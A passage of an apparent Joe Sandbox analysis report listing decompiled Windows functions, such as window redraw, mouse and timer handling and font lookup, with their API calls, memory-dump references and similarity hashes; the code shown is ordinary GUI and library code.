                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EE3
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EF4
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocatorDebugHeap
                  • String ID:
                  • API String ID: 571936431-0
                  • Opcode ID: a46f1abc368a64c7e8cee9726e8fc200ce1597963533e7c0d10cdf3b03dde394
                  • Instruction ID: 75f4d119a9a015ebfc198b74645a136ec549dedc4480b17ca40186e4ba262b1f
                  • Opcode Fuzzy Hash: a46f1abc368a64c7e8cee9726e8fc200ce1597963533e7c0d10cdf3b03dde394
                  • Instruction Fuzzy Hash: 795129B19101599BCB08EF95D892AFFB375BF94308F10412EF612772D1DB386A14CBA9
                  Uniqueness

                  Uniqueness Score: 4.01%

                  Function 004232E3, Relevance: 15.1, APIs: 10, Instructions: 97COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004232E3(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcW( *(__ecx + 0x20), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x20),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x84) & 0x00000400) != 0) {
						SetRect( &_v24, _t66 -  *0x44fc20, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x44fc20, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x84) & 0x00000800) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x44fc24, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x44fc24, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                  0x004232ec
                  0x004232f3
                  0x004232fa
                  0x00423304
                  0x00423312
                  0x00423318
                  0x0042331e
                  0x00423321
                  0x00423327
                  0x0042332a
                  0x0042332d
                  0x00423330
                  0x00423335
                  0x00423352
                  0x00423361
                  0x00423378
                  0x00423387
                  0x0042338d
                  0x00423390
                  0x00423390
                  0x00423395
                  0x004233b8
                  0x004233c3
                  0x004233da
                  0x004233e5
                  0x004233e5
                  0x00000000
                  0x004233eb
                  0x004233ef

                  APIs
                  • DefWindowProcW.USER32(?,00000046,00000000,?), ref: 004232FA
                  • GetWindowRect.USER32(?,?), ref: 00423312
                  • SetRect.USER32(?,?,00000000,?,?), ref: 00423352
                  • InvalidateRect.USER32(?,?,00000001), ref: 00423361
                  • SetRect.USER32(?,?,00000000,?,?), ref: 00423378
                  • InvalidateRect.USER32(?,?,00000001), ref: 00423387
                  • SetRect.USER32(?,00000000,?,?,?), ref: 004233B8
                  • InvalidateRect.USER32(?,?,00000001), ref: 004233C3
                  • SetRect.USER32(?,00000000,?,?,?), ref: 004233DA
                  • InvalidateRect.USER32(?,?,00000001), ref: 004233E5
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 0aef33b4db466b83b4f8328b8fad394f1946fd2b9da50446824a51982093460d
                  • Instruction ID: 52fc93fc332d92a77a98e75e025793c6dc5392896520ca2ae7a29eb4a3493525
                  • Opcode Fuzzy Hash: 0aef33b4db466b83b4f8328b8fad394f1946fd2b9da50446824a51982093460d
                  • Instruction Fuzzy Hash: BD311C72A40119BFDB04CFA4DD88FAFBBB8FB08314F104125FA45A75A0D775AA14CBA5
                  Uniqueness

                  Uniqueness Score: 1.05%

                  Function 00423CC8, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E00423CC8(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed int _v72;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int _t79;
				short _t80;
				short _t87;
				short _t92;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t115 = _a4;
				_t118 = __ecx;
				if(E0040C1EC(__ecx, __eflags, _t115) == 0) {
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_push(__ebx);
					_t100 = __ecx;
					_t60 = E0040F5D8(__ecx);
					__eflags =  *(__ecx + 0x84) & 0x00000020;
					_v20 = _t60;
					if(( *(__ecx + 0x84) & 0x00000020) != 0) {
						L5:
						__eflags = _t116 - 0x200;
						if(_t116 < 0x200) {
							L7:
							__eflags = _t116 - 0xa0 - 9;
							if(__eflags > 0) {
								L30:
								_t62 = E0040ED5B(_t118);
								__eflags = _t62;
								if(_t62 == 0) {
									L32:
									__eflags = _v20;
									if(_v20 == 0) {
										L35:
										_t63 = IsWindow( *(_t118 + 0x20));
										__eflags = _t63;
										if(_t63 == 0) {
											L37:
											__eflags = 0;
											return 0;
										}
										return E0040C7DE(_a4);
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t117 = _v20;
										_t67 =  *((intOrPtr*)( *_v20 + 0x108))(_a4);
										__eflags = _t67;
										if(_t67 != 0) {
											goto L1;
										}
										_t70 = E0040ED1C(_t117);
										_v20 = _t70;
										__eflags = _t70;
										if(_t70 != 0) {
											continue;
										}
										goto L35;
									}
									goto L1;
								}
								__eflags =  *(_t62 + 0x68);
								if( *(_t62 + 0x68) != 0) {
									goto L37;
								}
								goto L32;
							}
							L8:
							_v16 = E00420870(0x201, _t100, _t116, _t118, __eflags);
							_t72 = _a4;
							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
							_v28.x =  *(_t72 + 0x14);
							ScreenToClient( *(_t118 + 0x20),  &_v28);
							E004281D0(_t116,  &_v76, 0, 0x2c);
							_v76 = 0x30;
							_t79 =  *((intOrPtr*)( *_t118 + 0x74))(_v28.x, _v28.y,  &_v76);
							__eflags = _v40 - 0xffffffff;
							_v8 = _t79;
							if(__eflags != 0) {
								_push(_v40);
								E00428397(0x201, _t116, _t118, __eflags);
							}
							__eflags = _t116 - 0x201;
							if(_t116 != 0x201) {
								L13:
								_v12 = _v12 & 0x00000000;
								__eflags = _t116 - 0x201;
								if(_t116 != 0x201) {
									_t92 = GetKeyState(1);
									__eflags = _t92;
									if(_t92 < 0) {
										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
									}
								}
								L16:
								__eflags = _v8;
								if(_v8 < 0) {
									L26:
									_t80 = GetKeyState(1);
									__eflags = _t80;
									if(_t80 >= 0) {
										L28:
										 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
										KillTimer( *(_t118 + 0x20), 0xe001);
										L29:
										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
										goto L30;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v12;
								if(_v12 != 0) {
									goto L26;
								}
								__eflags = _t116 - 0x202;
								if(_t116 != 0x202) {
									__eflags =  *(_t118 + 0x80) & 0x00000008;
									if(( *(_t118 + 0x80) & 0x00000008) != 0) {
										L25:
										 *((intOrPtr*)( *_t118 + 0x178))(_v8);
										goto L29;
									}
									_t87 = GetKeyState(1);
									__eflags = _t87;
									if(_t87 < 0) {
										goto L25;
									}
									_t111 = _v16;
									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
										goto L29;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E004230F3(_t118);
									goto L29;
								}
								 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
								_push(0xc8);
								_push(0xe001);
								goto L20;
							}
							__eflags = _v72 & 0x80000000;
							if((_v72 & 0x80000000) == 0) {
								goto L13;
							}
							_v12 = 1;
							goto L16;
						}
						__eflags = _t116 - 0x209;
						if(__eflags <= 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t116 - 0x201;
					if(_t116 == 0x201) {
						goto L5;
					}
					__eflags = _t116 - 0x202;
					if(_t116 != 0x202) {
						goto L30;
					}
					goto L5;
				}
				L1:
				return 1;
			}




























                  0x00423cd2
                  0x00423cd6
                  0x00423cdf
                  0x00423ce9
                  0x00423cec
                  0x00423ced
                  0x00423cef
                  0x00423cf4
                  0x00423cfb
                  0x00423d03
                  0x00423d15
                  0x00423d15
                  0x00423d1b
                  0x00423d25
                  0x00423d2b
                  0x00423d2e
                  0x00423e6b
                  0x00423e6d
                  0x00423e73
                  0x00423e75
                  0x00423e7d
                  0x00423e7d
                  0x00423e81
                  0x00423ea9
                  0x00423eac
                  0x00423eb2
                  0x00423eb4
                  0x00423ec2
                  0x00423ec2
                  0x00000000
                  0x00423ec2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00423e83
                  0x00423e83
                  0x00423e83
                  0x00423e8d
                  0x00423e93
                  0x00423e95
                  0x00000000
                  0x00000000
                  0x00423e9d
                  0x00423ea2
                  0x00423ea5
                  0x00423ea7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00423ea7
                  0x00000000
                  0x00423e83
                  0x00423e77
                  0x00423e7b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00423e7b
                  0x00423d34
                  0x00423d39
                  0x00423d3c
                  0x00423d45
                  0x00423d4f
                  0x00423d52
                  0x00423d60
                  0x00423d76
                  0x00423d7d
                  0x00423d80
                  0x00423d84
                  0x00423d87
                  0x00423d89
                  0x00423d8c
                  0x00423d91
                  0x00423d92
                  0x00423d94
                  0x00423da8
                  0x00423da8
                  0x00423dac
                  0x00423dae
                  0x00423db2
                  0x00423db8
                  0x00423dbb
                  0x00423dc3
                  0x00423dc3
                  0x00423dbb
                  0x00423dc6
                  0x00423dc6
                  0x00423dca
                  0x00423e35
                  0x00423e37
                  0x00423e3d
                  0x00423e40
                  0x00423e48
                  0x00423e4e
                  0x00423e5c
                  0x00423e62
                  0x00423e68
                  0x00000000
                  0x00423e68
                  0x00423e42
                  0x00423e46
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00423e46
                  0x00423dcc
                  0x00423dd0
                  0x00000000
                  0x00000000
                  0x00423dd2
                  0x00423dd8
                  0x00423df9
                  0x00423e00
                  0x00423e26
                  0x00423e2d
                  0x00000000
                  0x00423e2d
                  0x00423e04
                  0x00423e0a
                  0x00423e0d
                  0x00000000
                  0x00000000
                  0x00423e12
                  0x00423e15
                  0x00423e18
                  0x00000000
                  0x00000000
                  0x00423e1a
                  0x00423e1f
                  0x00423df0
                  0x00423df2
                  0x00000000
                  0x00423df2
                  0x00423de0
                  0x00423de6
                  0x00423deb
                  0x00000000
                  0x00423deb
                  0x00423d96
                  0x00423d9d
                  0x00000000
                  0x00000000
                  0x00423d9f
                  0x00000000
                  0x00423d9f
                  0x00423d1d
                  0x00423d23
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00423d23
                  0x00423d05
                  0x00423d07
                  0x00000000
                  0x00000000
                  0x00423d09
                  0x00423d0f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00423d0f
                  0x00423ce1
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClientScreenWindow_memset
                  • String ID: 0
                  • API String ID: 1268500159-4108050209
                  • Opcode ID: cdc9807437cb956ac8afc672a6eea90ebacb15c207460598bf9ec07eb845d660
                  • Instruction ID: 0fec6943d037fae117efffd5b112a6bd77a27c9dfb4363ad2503283f5c7998d1
                  • Opcode Fuzzy Hash: cdc9807437cb956ac8afc672a6eea90ebacb15c207460598bf9ec07eb845d660
                  • Instruction Fuzzy Hash: 3251F031B00215DBCF20DF64E848BAEBBB1AF44306F90046BE855A72D1CB7D9E81CB49
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F91F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0040F91F(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __edi;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E0040F8F7(__ecx, __ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L11:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E00411E95(_t41);
						L14:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L11;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x20);
							_v8 = GetFocus();
							E0040E20E(_t30, _t34, SetActiveWindow( *(_t41 + 0x20)));
							SendMessageW( *(_t41 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}















                  0x0040f91f
                  0x0040f924
                  0x0040f927
                  0x0040f929
                  0x0040f931
                  0x0040f937
                  0x0040f93b
                  0x0040f940
                  0x0040f9c0
                  0x0040f9c5
                  0x0040f9d7
                  0x0040f9d7
                  0x00000000
                  0x0040f9cb
                  0x0040f9cd
                  0x0040f9d2
                  0x0040f9d4
                  0x0040f9d9
                  0x0040f9dc
                  0x0040f9dc
                  0x0040f9c5
                  0x0040f942
                  0x0040f945
                  0x00000000
                  0x00000000
                  0x0040f947
                  0x0040f94a
                  0x0040f95d
                  0x0040f967
                  0x0040f969
                  0x0040f96a
                  0x0040f97c
                  0x0040f982
                  0x0040f995
                  0x0040f9a6
                  0x0040f9a9
                  0x0040f9a9
                  0x0040f9b3
                  0x0040f9b8
                  0x0040f9b8
                  0x0040f9b3
                  0x0040f967
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ActiveFocus$MessageSend
                  • String ID: u
                  • API String ID: 1556911595-4067256894
                  • Opcode ID: 03c09f66aa66469b41d1ffc97829be183fd41b61f6962f411d1c1fffcaabf90d
                  • Instruction ID: aa23150ff275a4e762f8914b3b23eee449f5484b5983ccff72f0c3de55e904a0
                  • Opcode Fuzzy Hash: 03c09f66aa66469b41d1ffc97829be183fd41b61f6962f411d1c1fffcaabf90d
                  • Instruction Fuzzy Hash: 4D11A2B2500209BBDB346B75CD08B6B7A68EF44350B144437AD41E6AE1D73CDD14DA99
                  Uniqueness

                  Uniqueness Score: 1.05%

                  Function 00426026, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00426026(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v72;
				void _v100;
				intOrPtr _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v104 = __ecx;
				_t23 = L"System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectW(_t14, 0x5c,  &_v100) != 0) {
						_t23 =  &_v72;
						_t31 = GetDC(0);
						if(_v100 < 0) {
							_v100 =  ~_v100;
						}
						_t30 = MulDiv(_v100, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E00427DFF(E00425F01(_v104, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                  0x0042602e
                  0x00426035
                  0x0042603a
                  0x00426043
                  0x00426046
                  0x00426049
                  0x0042604e
                  0x00426052
                  0x0042605c
                  0x0042606b
                  0x0042606f
                  0x0042607c
                  0x0042607e
                  0x00426080
                  0x00426080
                  0x0042609b
                  0x0042609e
                  0x0042609e
                  0x004260a4
                  0x004260a4
                  0x004260aa
                  0x004260ac
                  0x004260ac
                  0x004260c7
                  0x004260c7
                  0x00426056
                  0x0042605a
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetStockObject.GDI32(00000011), ref: 0042604E
                  • GetStockObject.GDI32(0000000D), ref: 00426056
                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 00426063
                  • GetDC.USER32(00000000), ref: 00426072
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00426086
                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00426092
                  • ReleaseDC.USER32(00000000,00000000), ref: 0042609E
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Object$Stock$CapsDeviceRelease
                  • String ID: System
                  • API String ID: 46613423-3470857405
                  • Opcode ID: 92fd478b0662ce9854d8cc054db29d85497dde8bffd41103f762a27921a5552a
                  • Instruction ID: 78313164bb694d8cd67fa6a37877cf86e41f2752e4956e5a9859880c836a19c9
                  • Opcode Fuzzy Hash: 92fd478b0662ce9854d8cc054db29d85497dde8bffd41103f762a27921a5552a
                  • Instruction Fuzzy Hash: 18119031740328ABDB10DBA1ED49FAF7BB9AF54785F40402AFA059B1C0DA749C00DB69
                  Uniqueness

                  Uniqueness Score: 0.23%

                  Function 0042312D, Relevance: 13.6, APIs: 9, Instructions: 131timekeyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0042312D(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;

				_t76 = __ecx;
				_t89 = __ecx;
				_t42 = GetKeyState(1);
				_t90 = _t42;
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E00420870(_t72, _t76, _t84, _t89, _t90);
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x20),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x74))(_v20.x, _v20.y, 0, _t84, _t72);
				_v8 = _t49;
				if(_t49 < 0) {
					_t16 = _t85 + 0x4c;
					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
					__eflags =  *_t16;
					L18:
					if(_v8 < 0) {
						L27:
						if( *(_v12 + 0x4c) == 0xffffffff) {
							KillTimer( *(_t89 + 0x20), 0xe001);
						}
						 *((intOrPtr*)( *_t89 + 0x178))(0xffffffff);
						L30:
						_t53 = 0xe000;
						if(_a4 == 0xe000) {
							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
							if(_v8 >= 0) {
								_t53 =  *((intOrPtr*)( *_t89 + 0x178))(_v8);
							}
						}
						return _t53;
					}
					ClientToScreen( *(_t89 + 0x20),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L25:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
						L26:
						if(_v8 >= 0) {
							goto L30;
						}
						goto L27;
					}
					_t60 =  *(_t89 + 0x20);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L26;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x20));
						}
						if(_t63 == _t87) {
							goto L26;
						} else {
							goto L25;
						}
					}
				}
				_t64 = E0040F8F7(_t89, _t85);
				_t81 = _t89;
				_t75 = _t64;
				if(E00410A43(_t75, _t89) == 0) {
					L6:
					_v8 = _v8 | 0xffffffff;
					goto L7;
				} else {
					if(_t75 == 0) {
						E00413DD0(_t81);
					}
					_t81 = _t75;
					if(E00411E53(_t75) != 0) {
						L7:
						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
						if(_t66 != 0) {
							_t88 =  *((intOrPtr*)(_t66 + 0x20));
						} else {
							_t88 = 0;
						}
						_t68 = E0040E20E(_t75, _t81, GetCapture());
						if(_t68 != _t89) {
							if(_t68 != 0) {
								_t83 =  *((intOrPtr*)(_t68 + 0x20));
							} else {
								_t83 = 0;
							}
							if(_t83 != _t88 && E0040F8F7(_t68, _t88) == _t75) {
								_v8 = _v8 | 0xffffffff;
							}
						}
						goto L18;
					}
					goto L6;
				}
			}

























                  0x0042312d
                  0x00423138
                  0x0042313a
                  0x00423140
                  0x00423143
                  0x00423296
                  0x00423296
                  0x00423150
                  0x00423156
                  0x00423159
                  0x00423166
                  0x00423178
                  0x0042317b
                  0x00423180
                  0x004231ec
                  0x004231ec
                  0x004231ec
                  0x004231f0
                  0x004231fa
                  0x00423250
                  0x00423257
                  0x00423261
                  0x00423261
                  0x00423269
                  0x0042326f
                  0x0042326f
                  0x00423277
                  0x0042327d
                  0x00423283
                  0x0042328c
                  0x0042328c
                  0x00423283
                  0x00000000
                  0x00423293
                  0x00423203
                  0x00423209
                  0x00423215
                  0x00423219
                  0x0042323f
                  0x0042323f
                  0x00423242
                  0x00423246
                  0x0042324a
                  0x0042324e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042324e
                  0x0042321b
                  0x00423220
                  0x00000000
                  0x0042322e
                  0x00423231
                  0x00423236
                  0x00423238
                  0x00423238
                  0x0042323d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042323d
                  0x00423220
                  0x00423184
                  0x00423189
                  0x0042318b
                  0x00423194
                  0x004231aa
                  0x004231aa
                  0x00000000
                  0x00423196
                  0x00423198
                  0x0042319a
                  0x0042319a
                  0x0042319f
                  0x004231a8
                  0x004231ae
                  0x004231ae
                  0x004231b3
                  0x004231b9
                  0x004231b5
                  0x004231b5
                  0x004231b5
                  0x004231c3
                  0x004231ca
                  0x004231ce
                  0x004231d4
                  0x004231d0
                  0x004231d0
                  0x004231d0
                  0x004231d9
                  0x004231e6
                  0x004231e6
                  0x004231d9
                  0x00000000
                  0x004231ca
                  0x00000000
                  0x004231a8

                  APIs
                  • GetKeyState.USER32(00000001), ref: 0042313A
                  • GetCursorPos.USER32(?), ref: 00423159
                  • ScreenToClient.USER32(?,?), ref: 00423166
                  • GetCapture.USER32 ref: 004231BC
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • ClientToScreen.USER32(?,?), ref: 00423203
                  • WindowFromPoint.USER32(?,?), ref: 0042320F
                  • IsChild.USER32(?,00000000), ref: 00423224
                  • KillTimer.USER32(?,0000E001), ref: 00423261
                  • KillTimer.USER32(?,0000E000), ref: 0042327D
                    • Part of subcall function 00410A43: GetForegroundWindow.USER32 ref: 00410A57
                    • Part of subcall function 00410A43: GetLastActivePopup.USER32(?), ref: 00410A68
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromLastPointPopupStateThrow
                  • String ID:
                  • API String ID: 4177878703-0
                  • Opcode ID: f29916a0f4b2eaa4022af138b3364e60a3bde53017dbd197dab8f31c215de712
                  • Instruction ID: 79c1a7b2d7f8082b187d282f0430c5f361da3f181239cd66975711b34441f4d9
                  • Opcode Fuzzy Hash: f29916a0f4b2eaa4022af138b3364e60a3bde53017dbd197dab8f31c215de712
                  • Instruction Fuzzy Hash: F441B231700215DFCB209F65EC48AAE7BB5BF54315F6042AAE461D32A0DB3CDE51CB19
                  Uniqueness

                  Uniqueness Score: 1.23%

                  Function 0041F356, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E0041F356(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E0042925E(E004393D9, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E0041EFD6(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x4406e4;
							_t65 = _t39;
						}
